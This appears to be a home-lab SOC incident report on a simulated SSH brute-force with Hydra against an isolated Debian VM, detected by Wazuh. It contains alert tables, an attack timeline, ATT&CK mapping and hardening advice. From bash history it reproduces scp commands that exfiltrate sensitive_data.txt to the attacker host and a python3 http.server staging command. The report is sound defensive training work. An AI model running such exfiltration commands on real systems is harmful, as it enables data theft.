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SOC HOME LAB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Incident Investigation &amp; Analysis Report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Brute-Force SSH Attack &amp; Data Exfiltration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Report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SOC-LAB-2026-001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 of Incident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May 25,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Detection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Wazuh SIEM (v4.x)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Home SOC Lab — Isolated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 Severity | Confirmed Attack Simulation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SOC Analyst (Lab Owner)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3.1  Wazuh Alert Analysis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3.1.1  Alert Dashboard Overview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Wazuh SIEM dashboard recorded the following alert counts within the 24-hour observation window on May 25, 2026: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Level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Level 15 or higher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None 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Level 12 to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TRIGGERED — Brute-force +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Level 7 to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188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Mostly failed auth attempts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Level 0 to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318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General system / SSH noise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The 2 High severity alerts are the focal point of this investigation. They correspond directly to the SSH brute-force campaign executed using Hydra, followed by successful credential-based access.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3.1.2  Detailed Alert Records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Wazuh Discover was filtered using manager.name: debian and rule.level: 12 to 14, returning exactly 2 hits across the 24-hour window. Both alerts share an identical rule description and compliance mapping, confirming they represent the same attack pattern executed in two separate sessions.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May 25, 2026 @ 22:59:10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May 25, 2026 @ 22:55:26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Agent IP (Victim VM)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192.168.100.87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192.168.100.87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Source IP (Attacker)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192.168.100.86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192.168.100.86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Destination User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target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Source Port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36012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40986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Rule Level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12 (High)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12 (High)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Program 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sshd-session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sshd-session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Hostname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debian-target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debian-target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Rule Description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Multiple authentication failures followed by a success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Multiple authentication failures followed by a success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Mail Alert Triggered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true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3.1.3  Compliance Framework Mapping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Both alerts automatically satisfied the following regulatory controls, demonstrating that Wazuh's correlation engine correctly classified the activity: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Reference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PCI-DSS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10.2.4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Invalid logical access attempts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PCI-DSS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10.2.5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Use of and changes to identification and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PCI-DSS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11.4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Intrusion detection and prevention techniques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HIPAA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164.312.b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Audit controls for information system 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CC6.1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Logical and physical access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CC6.8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Prevention and detection of unauthorized software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CC7.2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System monitoring for anomalies and threats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CC7.3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Evaluation of security events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3.1.4  Why Only Two Alerts Were Generated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common question when reviewing Hydra output is why the SIEM only surfaces two alerts despite hundreds of underlying failed authentication events. The explanation lies in Wazuh's event correlation architecture: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Hydra generates a rapid sequence of failed SSH authentication attempts. Each failure is written to /var/log/auth.log on the victim VM and ingested by the Wazuh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Wazuh's correlation engine applies a sliding window rule (rule ID 5551 or similar) that watches for a configurable threshold of consecutive failures from the same source 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Once that threshold is crossed and a successful login is detected from the same source, the engine collapses all underlying events into a single high-severity correlated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This produces one alert per attack sequence, not one per failed attempt — hence two alerts for two separate Hydra runs / SSH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The raw failed attempts remain queryable in the Wazuh Discover view under rule IDs 5503 (authentication failure) and 5710 (SSH scan attempt).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3.2  Attack Timeline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following timeline reconstructs the full attack chain based on evidence gathered from Wazuh alert timestamps and post-incident analysis of the victim machine bash history file located at /home/target/.bash_history.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(May 25, 2026)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Observation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~22:50 – 22:55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Reconnaissance &amp; Brute-Force (Session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 (192.168.100.86)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Hydra initiated against SSH service on 192.168.100.87. Rapid credential stuffing across the 'target' account. Hundreds of failed authentication events generated in auth.log.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22:55:26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Initial Access (Session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Wazuh Alert #1 fired (Level 12). Correlation threshold met — multiple failures followed by a successful SSH login. Source port: 40986.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~22:55 – 22:58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Discovery / Interaction (Session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 on Victim VM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 logged into victim VM as user 'target'. Executed: cat sensitive_data.txt — file contents read directly on the victim host.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~22:58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Collection (Session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Python HTTP server launched on the victim: python3 -m http.server 8080. This staged the file for over-the-network retrieval.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~22:58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Exfiltration — SCP Pull (Session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SCP pull executed from attacker machine: scp target@192.168.100.162:/home/target/sensitive_data.txt /home/kali/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~22:58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Exfiltration — SCP Push (Session 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 on Victim VM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SCP push from victim to attacker: scp target@192.168.100.87:/home/target/sensitive_data.txt . — file copied locally on attacker.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~22:59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Exfiltration — Second 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 on Victim VM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Additional exfiltration: scp /home/target/sensitive_data.txt target@192.168.100.162:/home/kali/sensitive_data.txt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~22:59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Exfiltration — Renamed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 on Victim VM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Final exfiltration with renamed destination: scp /home/target/sensitive_data.txt target@192.168.100.162:/home/kali/data.txt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22:59:10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Second Access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Wazuh Alert #2 fired (Level 12). A second SSH session was established. Source port: 36012. Indicates attacker re-authenticated to the victim.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~22:59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Session Termination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logout command executed. SSH session closed. Attack concluded.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3.2.1  MITRE ATT&amp;CK Technique Mapping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ATT&amp;CK Technique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Brute Force: Password Guessing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T1110.001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Hydra used against SSH on port 22; hundreds of auth failures preceding successful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Valid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T1078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Successful SSH login as user 'target' after credential discovery via Hydra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Command and Scripting Interpreter: Unix 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T1059.004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Shell commands executed post-login on victim VM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 from Local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T1005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cat sensitive_data.txt executed to read staged sensitive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Ingress Tool Transfer / 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T1105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python3 -m http.server 8080 used to stage data for network transfer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Exfiltration Over Alternative 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T1048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SCP used to transfer sensitive_data.txt from victim to attacker machine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3.3  Incident Report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3.3.1  Executive Summary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On May 25, 2026, a simulated threat actor operating from IP address 192.168.100.86 (Kali Linux attacker VM) conducted a credential brute-force attack against the SSH service of the victim machine at 192.168.100.87 (debian-target). The attack successfully compromised the 'target' user account, gained interactive shell access to the victim system, and exfiltrated a file identified as sensitive_data.txt to the attacker-controlled host via multiple SCP transfer methods. The activity was detected and alerted by the Wazuh SIEM platform, generating two High severity (Rule Level 12) correlated events.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3.3.2  Systems Involved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15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Attacker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kali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192.168.100.86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Kali Linux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Ran Hydra, SCP client, SSH client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Victim /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debian-target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192.168.100.87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Debian 12 x64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Wazuh agent installed; SSH exposed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Wazuh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debian (manager)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Local/same network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Debian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Received and correlated all alerts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Alternate Exfil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192.168.100.162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Kali Linux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Used as SCP push destination in later commands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3.3.3  Commands Executed on Victim Machine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Post-incident forensic review of /home/target/.bash_history on the victim VM revealed the following command sequence executed by the threat actor during the active compromise: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View file contents on victim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sensitive_data.txt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Stage file via HTTP server for network retrieval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python3 -m http.server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Pull file from victim to attacker (run from attacker side)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scp target@192.168.100.162:/home/target/sensitive_data.txt /home/kali/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Push file from victim to attacker (run from victim side)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scp target@192.168.100.87:/home/target/sensitive_data.txt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5: Push with full destination path on attacker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scp /home/target/sensitive_data.txt target@192.168.100.162:/home/kali/sensitive_data.txt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6: Push with renamed destination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scp /home/target/sensitive_data.txt target@192.168.100.162:/home/kali/data.txt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7: Terminate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logout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6C09" w:sz="4"/>
              <w:left w:val="thick" w:color="E36C09" w:sz="12"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="4"/>
              <w:right w:val="single" w:color="E36C09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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FINDING: </w:t>
            </w:r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The threat actor employed four separate exfiltration methods for the same file, likely to verify successful transfer or to persist a copy under an alternate filename (data.txt). This behaviour is consistent with a methodical attacker ensuring data retrieval success.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3.3.4  Data Exfiltration Assessment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Exfiltration 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Path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SCP Pull (from attacker)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Victim → Attacker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/home/kali/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SCP Push (victim-side)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Victim → Attacker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. (attacker home)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SCP Push (explicit path)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Victim → Attacker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/home/kali/sensitive_data.txt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SCP Push (renamed)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Victim → Attacker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/home/kali/data.txt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HTTP Server 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Victim (localhost)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Port 8080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Confirmed — staged file for retrieval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3.3.5  Detection Gaps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Wazuh did not generate specific alerts for the python3 HTTP server launch or any SCP data transfer events, as File Integrity Monitoring (FIM) was not configured for the /home/target/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Post-login command execution was not captured in real-time by Wazuh, as auditd integration was not active on the victim VM during this exercise.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The exfiltrated file contents and size are unknown from Wazuh telemetry alone, as network-level DLP controls were not in place.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3.4  Recommendations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3.4.1  Immediate Hardening Measures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Disable SSH password authentication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Set PasswordAuthentication no in /etc/ssh/sshd_config; enforce key-based auth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Implement SSH rate limiting / lockout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Deploy fail2ban with a threshold of 5 failures / 60 seconds; auto-ban offending IPs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Restrict SSH access by IP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Use AllowUsers target@192.168.100.x or firewall rules to whitelist authorised source IPs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Enable Wazuh File Integrity Monitoring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Add /home/target/ and /home/kali/ to the FIM configuration in ossec.conf to alert on file creation and modification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Integrate auditd with Wazuh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Install auditd; configure rules to log execve syscalls; link to Wazuh for real-time shell command logging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Restrict outbound SCP / SFP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Apply egress firewall rules limiting port 22 outbound to authorised destinations; log all deviations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Alert on Python HTTP server launch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Create a custom Wazuh rule to detect processes matching python.*http.server on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Enable SSH login banners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Add a legal warning banner via /etc/issue.net and Banner directive in sshd_config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3.4.2  SIEM &amp; Detection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Configure custom Wazuh rules to detect SCP usage patterns indicative of bulk data transfer from sensitive directories.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Enable Wazuh's built-in active response module to automatically block source IPs that trigger brute-force correlation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Integrate network flow data (NetFlow / Zeek) into the SIEM pipeline to provide visibility into data volume transferred via SCP, enabling DLP-style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Review and tune the alert thresholds for rule levels 7–11; 188 medium alerts indicate significant authentication noise that could be reduced through allowlisting of legitimate service accounts.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3.4.3  Lab Extension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Deploy Zeek or Suricata as a network IDS alongside Wazuh to capture SCP and HTTP exfiltration at the packet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Configure Wazuh's vulnerability detection module to assess the victim VM for any exploitable CVEs in the SSH daemon or OS packages.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Simulate the same attack with key-based authentication enforced to observe the difference in Wazuh telemetry and confirm the hardening effectiveness.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Explore the Wazuh MITRE ATT&amp;CK module in the dashboard to visualise how the captured techniques map to the ATT&amp;CK framework matrix.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Add a Sigma rule or custom decoder for python3 -m http.server to build detection coverage for this common staging technique.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3.4.4  Summary Risk Matrix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Risk After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SSH brute-force credential compromise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Low — with fail2ban + key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Unauthorized file access post-login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Medium — requires auditd + FIM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 exfiltration via SCP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Low — with egress firewall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Undetected HTTP staging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Low — with custom Wazuh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Lateral movement to 192.168.100.162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Medium — with network segmentation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6" w:space="4"/>
        </w:pBdr>
      </w:pP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Report — SOC-LAB-2026-001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For Lab Use Only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SOC HOME LAB — Incident Report | Wazuh SIEM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2026-05-25T20:03:43.199Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T20:03:43.199Z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